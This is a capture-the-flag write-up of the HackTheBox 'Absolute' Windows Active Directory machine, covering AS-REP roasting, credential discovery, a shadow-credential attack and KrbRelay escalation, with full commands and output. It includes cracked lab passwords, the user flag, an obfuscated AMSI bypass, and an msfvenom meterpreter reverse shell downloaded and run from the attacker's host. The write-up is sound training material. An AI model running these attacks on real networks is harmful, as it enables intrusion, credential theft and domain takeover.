HTB - Absolute

Description

---

Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn't require Pre-authentication, therefore posing a valuable target for an ASREP roast attack. The discovered credentials are then used to enumerate LDAP and discover credentials for the user svc_smb, who has access to an SMB share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an LDAP connection to the Domain Controller with clear text credentials for the m.lovegod user, who owns the Network Audit group, which in turn has Generic Write over the winrm_user. Following this attack path and performing a shadow credential attack on the winrm_user, one can then WinRM and access the machine. Finally, the KrbRelay tool is used to add the winrm_user user to the Administrators group, leading to fully elevated privileges.

Enumeration

---

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-01 18:41:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after:  2024-07-16T21:11:52
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: 2024-11-01T18:42:29
|_  start_date: N/A

Summary

* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - LDAP - LDAPS - winRM - SMB
* Important notes: DNS:dc.absolute.htb - Domain: absolute.htb - IIS httpd 10.0

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $sudo sh -c "echo  '$ip dc dc.absolute.htb absolute.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $tail -n 1 /etc/hosts
10.10.11.181 dc dc.absolute.htb absolute.htb

Service Enumeration

I will start this box differently by enumerating the HTTP service first.

HTTP Enumeration

http://absolute.htb/absolute.htb

I didn't find anything in the webapp, So I tried to fuzz it but nothing interesting here only few common directories.

There are several images here, you can switch between them using the arrows.

If I look at the page code I will see their locations and names.

When I visit the images directory at http://absolute.htb/images/, I get Access denied.

I will switch now to my terminal to download each image

for i in {1..6};do wget -q http://absolute.htb/images/hero_$i.jpg;done

Looking at the image metadata, I see author and arrtist field containing names

I can use these names to create a wordlist and check for valid domain accounts

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $for image in $(ls); do exiftool $image | grep -i "Artist\|Author" | cut -d: -f2 | sort -u | tee -a users.txt;done

 James Roberts
 Michael Chaffrey
 Donald Klay
 Sarah Osvald
 Jeffer Robinson
 Nicole Smith

Then, I will mutate these names to create possible combinations of them

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $/opt/tools/username-anarchy/username-anarchy -i users.txt > users.lst

Bruting kerberos to find valid users

kerbrute userenum -d absolute --dc dc.absolute.htb wordlists/users.lst -o wordlists/valid_users.lst

j.roberts
m.chaffrey
s.osvald
d.klay
j.robinson
n.smith

Foothold

---

With this wordlist, I can move to attempt ASREPRoasting an attack

nxc ldap dc -u valid_domain_users.lst -p '' -d absolute.htb --asreproast asrep.hashes

The hash is cracked successfully :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $hashcat -m 18200 hashes/asrep.hashes /usr/share/wordlists/rockyou.txt 

..snip..
$krb5asrep$23$d.klay@ABSOLUTE.HTB:19d6d35c374ae22b5c9f38860c1eddf5$ba7a42c258f10291c22324fc98d8618deaf7e325d2a47ceea3ad7367cef4391c8f6c4cfb40b7e82785064bf952da2929213555bbe13b7d2edb0c4dc7da0b5496d8115c53535866328272d61f004106a834f03e176701302e51accb139155d1b7ba5311b82407d515a2cbd3e713176cdfde686d2fd6bf9e37e13f16d629dd607965638f16fe9795bf756449e36cecf3ed2b557c169bcee012d77bd904631e665a3f89f2737650fa4b6279fc9956c48ab55b20feff7531e2a66896b939fc6d4c25ded4c217a64f10d3cc97c1551a7b33b7bdabeb23e978e09c39ca101d180636a126d6419cea3a8661e32b117a:Darkmoonsky248girl

Session..........: hashcat
Status...........: Cracked

Now, I will make a To-do list to not forget anything in Enumeration phase

• Check SMB shares access

• Collect domain info with bloodhound.py

• Collect LDAP data with ldapdomaindump

• Check for winRM access using bloodhound query

• Check for ADCS existence

• Check for common CVE GoldenPac, Petitpotam

• Check for LDAP signing for possible NTLM relay attack

• Check for password reuse

nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -M spider_plus

This error message means NTLM authentication is disabled, So I need to use kerberos authentication instead.

I don't have permission the interesting share folder so that I will move forward.

I can't use ldapdomaindump since the NTLM authentication is disabled but bloodhound.py is smart enough to switch to Kerberos authentication automatically

─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $bloodhound-python -u 'd.klay' -p 'Darkmoonsky248girl' -ns 10.10.11.181 -d absolute.htb -c all                                                                                           
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Done in 420M 45S

PKI exists on the domain

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M adcs -k

LDAP        dc              389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
ADCS        dc              389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        dc              389    DC               Found PKI Enrollment Server: dc.absolute.htb
ADCS        dc              389    DC               Found CN: absolute-DC-CA

The target is not vulnerable to noPac but it's for petitpotam. I will note it down maybe I need it later.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M nopac

SMB         dc              445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
NOPAC       dc              445    DC               TGT with PAC size 1556
NOPAC       dc              445    DC               TGT without PAC size 1556

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M petitpotam

SMB         dc              445    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
PETITPOTAM  dc              445    DC               VULNERABLE
PETITPOTAM  dc              445    DC               Next step: https://github.com/topotam/PetitPotam

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M ldap-checker -k

LDAP        dc              389    DC               [+] absolute.htb\d.klay:Darkmoonsky248girl 
LDAP-CHE... dc              389    DC               LDAP Signing NOT Enforced!
LDAP-CHE... dc              389    DC               LDAPS Channel Binding is set to "NEVER"

I don't have winRM access to the box, either.

I want to get all the users in the domain, So I will use NetExec to get and luckily I go a user's credentials from the description field

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'svc_smb' -p 'AbsoluteSMBService123!' -k

LDAP    dc    389    DC      [+] absolute.htb\svc_smb:AbsoluteSMBService123! 

With the two passwords I have, I will try password spraying against the users I just found

AbsoluteSMBService123!
Darkmoonsky248girl

Unfortunately, I didn't get any additional account

Checking the shares with the new user credential reveals that I have READ access on Shared folder

There are only 2 files in the share folder: compile.sh and test.exe

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/dc.json
{
    "NETLOGON": {},
    "SYSVOL": {},
    "Shared": {
        "compiler.sh": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 09:20:32",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "72 B"
        },
        "test.exe": {
            "atime_epoch": "2022-06-09 04:30:03",
            "ctime_epoch": "2022-06-08 00:13:07",
            "mtime_epoch": "2022-09-01 13:02:23",
            "size": "66 KB"
        }
    }
}

Connect to the shared folder and download the files after getting Kerberos ticket for easy access

kinit svc_smb
impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass

Lateral Movement

---

I will switch now to Windows VM to run this program or decompile it with dnSpy

When I run the file and Wireshark captures the network traffic, several DNS traffic comes into play

It tries to resolve _ldap._tcp.dc.absolute.htb

I will try the machine's IP 10.10.11.182 and run the program again

Make sure you connected with HTB Network with .ovpn file. I was using OpenVPN GUI client

It performs ldap binding

Here is the credentials it sends over the network mlovegod:AbsoluteLDAP2022!

There isn't a user with mlovegod name but there is m.lovegod

He Owns the Network Audit groups

Svc_audit user is a member of network audit and has GenericWrite over winrm_user

Only this user winrm_user can access the machine via winRM

So the attack path is:

1. Abuse Ownership of Network Audit groups to Give me GenericAll rights

2. Add me to this Group and gain its privileges

3. Abuse GenericWrite to add shadow credentials or change the password of winrm_user

4. Access the machine using winrm_user

./bloodyAD -u m.lovegod -p 'AbsoluteLDAP2022!' -d absolute.htb --dc-ip 10.10.11.181 -k --host dc.absolute.htb add genericAll "CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB" m.lovegod

python3 powerview.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
Add-DomainGroupMember -Identity "Network audit" -Members m.lovegod

kinit m.lovegod
KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
Or
python3 pywhisker.py -d absolute.htb -u m.lovegod -p 'AbsoluteLDAP2022!' --target winrm_user --action add -k
python3 gettgtpkinit.py -cert-pfx file.pfx -pfx-pass <pass> absolute.htb/winrm_user winrm.ccache
KRB5CCNAME=winrm.ccache python3 getnthash.py -key <aes256_key> absolute.htb/winrm_user

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb

..snip..
[*] Adding Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $KRB5CCNAME=`pwd`/winrm_user.ccache evil-winrm -i dc -r absolute.htb

*Evil-WinRM* PS C:\Users\winrm_user\Documents> type ..\Desktop\user.txt
18dcdc1a7cf18d75167fbebf08f483b5

User Flag: 18dcdc1a7cf18d75167fbebf08f483b5

Privilege Escalation

---

After getting access to the machine, I want to upgrade my shell to a persistent one. I will use meterpreter because I'm comfortable with it.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.12 lport=9001 -f psh -o shell.ps1

[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

iex(iwr -UseBasicParsing 10.10.16.12/shell.ps1)

┌─[kali@parrot]─[~/tools]
└──╼ $ sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.12;set lport 9001;set payload windows/x64/meterpreter/reverse_tcp; run'

[*] Started reverse TCP handler on 0.0.0.0:9001 
[*] Sending stage (200774 bytes) to 10.10.11.181
[*] Meterpreter session 1 opened (10.10.16.12:9001 -> 10.10.11.181:58987) at 2024-11-02 02:08:21 -0400

(Meterpreter 1)(C:\Windows\system32) > 

Since I found that ldap signing is disabled at the beginning, I can perform relaying against it with my access to the machine.

I will use this repo:

GitHub - cube0x0/KrbRelay: Framework for Kerberos relayingGitHub

Following the repo, I can use several options here

CLSID of Windows 2019

First, we need to get the port number that allows SYSTEM

.\CheckPort.exe

..snip..
[*] SYSTEM Is allowed through port 10

I need to run the exploit in different logon types: 2 or 9

.\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 'KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10'

.\RunasCs.exe d.klay Darkmoonsky248girl -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -add-groupmember administrators winrm_user"

PS C:\Users\Administrator\Desktop> type root.txt

Root Flag: adce565cxxxxxxxxxxxxxxxxxx